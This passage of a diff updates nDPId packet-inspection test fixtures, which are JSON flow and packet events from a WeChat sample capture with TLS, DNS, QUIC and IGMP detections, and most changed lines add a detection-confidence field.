+00893{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":389,"source":"wechat.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1492167401063,"flow_last_seen":1492167402665,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1666,"flow_avg_l4_payload_len":208,"midstream":0,"ts_msec":1492167402665,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54098,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}}
+01428{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":391,"source":"wechat.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1492167401063,"flow_last_seen":1492167402666,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1688,"flow_tot_l4_payload_len":3354,"flow_avg_l4_payload_len":335,"midstream":0,"ts_msec":1492167402666,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54098,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","server_names":"webpush1.wechat.com,webpush.wechat.com,login.web.wechat.com,webpush.web.wechat.com,webpush2.wechat.com,webpush.web2.wechat.com,file.web2.wechat.com,web1.wechat.com,file.web.wechat.com,loginpoll.wechat.com,web2.wechat.com,login.wechat.com,login.web2.wechat.com,res.wechat.com,web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=GeoTrust Inc., CN=GeoTrust SSL CA - G3","subjectDN":"C=HK, ST=HongKong, L=Wan Chai, O=Tencent Mobility Limited, CN=web.wechat.com","alpn":"h2,http\/1.1","fingerprint":"4F:3B:6A:87:0C:D2:34:09:C9:53:9F:6F:EE:7D:7B:9B:E9:D6:EF:C1"}}
 00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":466,"source":"wechat.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":3,"flow_last_seen":1492167422952,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1492167422952,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0KNBAAEAGqhvAqAFn2DrNjsJ7AbvMOVSD1yvysIAQAT2SvQAAAQEICgAw\/kAycps2"}
 00585{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":468,"source":"wechat.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":16,"flow_first_seen":1492167338426,"flow_last_seen":1492167413269,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":640,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1492167432005,"l3_proto":"ip6","src_ip":"fe80::7a92:9cff:fe0f:a88e","dst_ip":"ff02::fb","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00576{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":468,"source":"wechat.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":16,"flow_first_seen":1492167338426,"flow_last_seen":1492167413269,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":640,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1492167432005,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00534{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":474,"source":"wechat.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167440370,"flow_last_seen":1492167440370,"flow_idle_time":600000,"flow_min_l4_payload_len":12,"flow_max_l4_payload_len":12,"flow_tot_l4_payload_len":12,"flow_avg_l4_payload_len":12,"midstream":0,"ts_msec":1492167440370,"l3_proto":"ip4","src_ip":"192.168.1.254","dst_ip":"224.0.0.1","l4_proto":2,"flow_datalink":1,"flow_max_packets":3}
 00438{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":474,"source":"wechat.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":1,"flow_last_seen":1492167440370,"flow_idle_time":600000,"pkt_oversize":false,"pkt_caplen":50,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":38,"pkt_len":50,"pkt_l4_len":12,"ts_msec":1492167440370,"pkt":"AQBeAAAB8IQvSpdgCABGoAAkj9gAAAEC8bPAqAH+4AAAAZQEAAARZOybAAAAAAIAAAA="}
-00567{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":474,"source":"wechat.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167440370,"flow_last_seen":1492167440370,"flow_idle_time":600000,"flow_min_l4_payload_len":12,"flow_max_l4_payload_len":12,"flow_tot_l4_payload_len":12,"flow_avg_l4_payload_len":12,"midstream":0,"ts_msec":1492167440370,"l3_proto":"ip4","src_ip":"192.168.1.254","dst_ip":"224.0.0.1","l4_proto":2,"ndpi": {"proto":"IGMP","breed":"Acceptable","category":"Network"}}
+00593{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":474,"source":"wechat.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167440370,"flow_last_seen":1492167440370,"flow_idle_time":600000,"flow_min_l4_payload_len":12,"flow_max_l4_payload_len":12,"flow_tot_l4_payload_len":12,"flow_avg_l4_payload_len":12,"midstream":0,"ts_msec":1492167440370,"l3_proto":"ip4","src_ip":"192.168.1.254","dst_ip":"224.0.0.1","l4_proto":2,"ndpi": {"confidence": {"4":"DPI"},"proto":"IGMP","breed":"Acceptable","category":"Network"}}
 00535{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":475,"source":"wechat.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167440984,"flow_last_seen":1492167440984,"flow_idle_time":600000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"ts_msec":1492167440984,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"224.0.0.22","l4_proto":2,"flow_datalink":1,"flow_max_packets":3}
 00445{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":475,"source":"wechat.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":1,"flow_last_seen":1492167440984,"flow_idle_time":600000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":38,"pkt_len":54,"pkt_l4_len":16,"ts_msec":1492167440984,"pkt":"AQBeAAAW0CeIF3AECABGoAAoPPkAAAECRRTAqAFk4AAAFpQEAAAiAOwAAAAAAQIAAADv\/\/\/9"}
-00568{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":475,"source":"wechat.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167440984,"flow_last_seen":1492167440984,"flow_idle_time":600000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"ts_msec":1492167440984,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"224.0.0.22","l4_proto":2,"ndpi": {"proto":"IGMP","breed":"Acceptable","category":"Network"}}
-00651{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":476,"source":"wechat.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1492167342857,"flow_last_seen":1492167342893,"flow_idle_time":180000,"flow_min_l4_payload_len":52,"flow_max_l4_payload_len":230,"flow_tot_l4_payload_len":282,"flow_avg_l4_payload_len":141,"midstream":0,"ts_msec":1492167442172,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":53734,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNS.Google","breed":"Acceptable","category":"Web"}}
-00666{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":476,"source":"wechat.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1492167351026,"flow_last_seen":1492167351061,"flow_idle_time":180000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":185,"flow_tot_l4_payload_len":218,"flow_avg_l4_payload_len":109,"midstream":0,"ts_msec":1492167442172,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":55862,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNS.GoogleDocs","breed":"Acceptable","category":"Collaborative"}}
-00656{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":476,"source":"wechat.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":13,"flow_first_seen":1492167350385,"flow_last_seen":1492167350562,"flow_idle_time":180000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":6290,"flow_avg_l4_payload_len":483,"midstream":0,"ts_msec":1492167442172,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"172.217.23.67","src_port":51507,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"QUIC.Google","breed":"Acceptable","category":"Web"}}
-00651{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":476,"source":"wechat.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1492167350333,"flow_last_seen":1492167350372,"flow_idle_time":180000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":192,"flow_tot_l4_payload_len":225,"flow_avg_l4_payload_len":112,"midstream":0,"ts_msec":1492167442172,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":46078,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNS.Google","breed":"Acceptable","category":"Web"}}
-00671{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":476,"source":"wechat.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":13,"flow_first_seen":1492167351067,"flow_last_seen":1492167352398,"flow_idle_time":180000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":4266,"flow_avg_l4_payload_len":328,"midstream":0,"ts_msec":1492167442172,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"216.58.198.46","src_port":57591,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"QUIC.GoogleDocs","breed":"Acceptable","category":"Collaborative"}}
+00594{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":475,"source":"wechat.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167440984,"flow_last_seen":1492167440984,"flow_idle_time":600000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"ts_msec":1492167440984,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"224.0.0.22","l4_proto":2,"ndpi": {"confidence": {"4":"DPI"},"proto":"IGMP","breed":"Acceptable","category":"Network"}}
+00677{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":476,"source":"wechat.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1492167342857,"flow_last_seen":1492167342893,"flow_idle_time":180000,"flow_min_l4_payload_len":52,"flow_max_l4_payload_len":230,"flow_tot_l4_payload_len":282,"flow_avg_l4_payload_len":141,"midstream":0,"ts_msec":1492167442172,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":53734,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"}}
+00692{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":476,"source":"wechat.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1492167351026,"flow_last_seen":1492167351061,"flow_idle_time":180000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":185,"flow_tot_l4_payload_len":218,"flow_avg_l4_payload_len":109,"midstream":0,"ts_msec":1492167442172,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":55862,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.GoogleDocs","breed":"Acceptable","category":"Collaborative"}}
+00682{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":476,"source":"wechat.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":13,"flow_first_seen":1492167350385,"flow_last_seen":1492167350562,"flow_idle_time":180000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":6290,"flow_avg_l4_payload_len":483,"midstream":0,"ts_msec":1492167442172,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"172.217.23.67","src_port":51507,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"}}
+00677{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":476,"source":"wechat.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1492167350333,"flow_last_seen":1492167350372,"flow_idle_time":180000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":192,"flow_tot_l4_payload_len":225,"flow_avg_l4_payload_len":112,"midstream":0,"ts_msec":1492167442172,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":46078,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"}}
+00697{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":476,"source":"wechat.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":13,"flow_first_seen":1492167351067,"flow_last_seen":1492167352398,"flow_idle_time":180000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":4266,"flow_avg_l4_payload_len":328,"midstream":0,"ts_msec":1492167442172,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"216.58.198.46","src_port":57591,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.GoogleDocs","breed":"Acceptable","category":"Collaborative"}}
 00442{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":478,"source":"wechat.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":2,"flow_last_seen":1492167443647,"flow_idle_time":600000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":38,"pkt_len":54,"pkt_l4_len":16,"ts_msec":1492167443647,"pkt":"AQBeAAAW0CeIF3AECABGoAAoPPoAAAECRRPAqAFk4AAAFpQEAAAiAPsBAAAAAQIAAADgAAD8"}
 00442{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":479,"source":"wechat.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":3,"flow_last_seen":1492167444467,"flow_idle_time":600000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":38,"pkt_len":54,"pkt_l4_len":16,"ts_msec":1492167444467,"pkt":"AQBeAAAW0CeIF3AECABGoAAoPPwAAAECRRHAqAFk4AAAFpQEAAAiAPsCAAAAAQIAAADgAAD7"}
 00535{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":488,"source":"wechat.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167449288,"flow_last_seen":1492167449288,"flow_idle_time":600000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"ts_msec":1492167449288,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"224.0.0.22","l4_proto":2,"flow_datalink":1,"flow_max_packets":3}
 00442{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":488,"source":"wechat.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":1,"flow_last_seen":1492167449288,"flow_idle_time":600000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":38,"pkt_len":54,"pkt_l4_len":16,"ts_msec":1492167449288,"pkt":"AQBeAAAWeJKcD6iOCABGwAAoAABAAAECQerAqAFn4AAAFpQEAAAiAPsCAAAAAQIAAADgAAD7"}
-00568{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":488,"source":"wechat.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167449288,"flow_last_seen":1492167449288,"flow_idle_time":600000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"ts_msec":1492167449288,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"224.0.0.22","l4_proto":2,"ndpi": {"proto":"IGMP","breed":"Acceptable","category":"Network"}}
+00594{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":488,"source":"wechat.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167449288,"flow_last_seen":1492167449288,"flow_idle_time":600000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"ts_msec":1492167449288,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"224.0.0.22","l4_proto":2,"ndpi": {"confidence": {"4":"DPI"},"proto":"IGMP","breed":"Acceptable","category":"Network"}}
 00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":491,"source":"wechat.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167452759,"flow_last_seen":1492167452759,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1492167452759,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54099,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":491,"source":"wechat.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":1,"flow_last_seen":1492167452759,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1492167452759,"pkt":"8IQvSpdgeJKcD6iOCABFAAA8XuFAAEAGtlvAqAFny82XotNTAbtWrkW6AAAAAKACchAjbQAAAgQFtAQCCAoAMRtbAAAAAAEDAwc="}
 00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":493,"source":"wechat.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167453010,"flow_last_seen":1492167453010,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1492167453010,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54100,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":493,"source":"wechat.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":1,"flow_last_seen":1492167453010,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1492167453010,"pkt":"8IQvSpdgeJKcD6iOCABFAAA8DstAAEAGBnLAqAFny82XotNUAbuiFhVRAAAAAKACchAILgAAAgQFtAQCCAoAMRuaAAAAAAEDAwc="}
 00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":494,"source":"wechat.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":2,"flow_last_seen":1492167453125,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1492167453125,"pkt":"eJKcD6iO8IQvSpdgCABFoAA8AABAAC0GJ53LzZeiwKgBZwG701NWIPBqVq5Fu6ASN8jLwAAAAgQFoAQCCApF0gWaADEbWwEDAwc="}
 00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":495,"source":"wechat.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":3,"flow_last_seen":1492167453125,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1492167453125,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0XuJAAEAGtmLAqAFny82XotNTAbtWrkW7ViDwa4AQAOUxAAAAAQEICgAxG7dF0gWa"}
-00810{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":496,"source":"wechat.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1492167452759,"flow_last_seen":1492167453126,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":238,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":59,"midstream":0,"ts_msec":1492167453126,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54099,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}}
+00836{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":496,"source":"wechat.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1492167452759,"flow_last_seen":1492167453126,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":238,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":59,"midstream":0,"ts_msec":1492167453126,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54099,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}}
 00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":497,"source":"wechat.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":2,"flow_last_seen":1492167453357,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1492167453357,"pkt":"eJKcD6iO8IQvSpdgCABFoAA8AABAAC4GJp3LzZeiwKgBZwG701Rfi5PhohYVUqASN8gDZQAAAgQFoAQCCApF0gXVADEbmgEDAwc="}
 00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":498,"source":"wechat.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":3,"flow_last_seen":1492167453357,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1492167453357,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0DsxAAEAGBnnAqAFny82XotNUAbuiFhVSX4uT4oAQAOVoqQAAAQEICgAxG\/FF0gXV"}
-00867{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":500,"source":"wechat.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1492167452759,"flow_last_seen":1492167453494,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1666,"flow_avg_l4_payload_len":277,"midstream":0,"ts_msec":1492167453494,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54099,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}}
-01401{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":502,"source":"wechat.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1492167452759,"flow_last_seen":1492167453503,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1688,"flow_tot_l4_payload_len":3354,"flow_avg_l4_payload_len":419,"midstream":0,"ts_msec":1492167453503,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54099,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","server_names":"webpush1.wechat.com,webpush.wechat.com,login.web.wechat.com,webpush.web.wechat.com,webpush2.wechat.com,webpush.web2.wechat.com,file.web2.wechat.com,web1.wechat.com,file.web.wechat.com,loginpoll.wechat.com,web2.wechat.com,login.wechat.com,login.web2.wechat.com,res.wechat.com,web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=GeoTrust Inc., CN=GeoTrust SSL CA - G3","subjectDN":"C=HK, ST=HongKong, L=Wan Chai, O=Tencent Mobility Limited, CN=web.wechat.com","alpn":"h2,http\/1.1","fingerprint":"4F:3B:6A:87:0C:D2:34:09:C9:53:9F:6F:EE:7D:7B:9B:E9:D6:EF:C1"}}
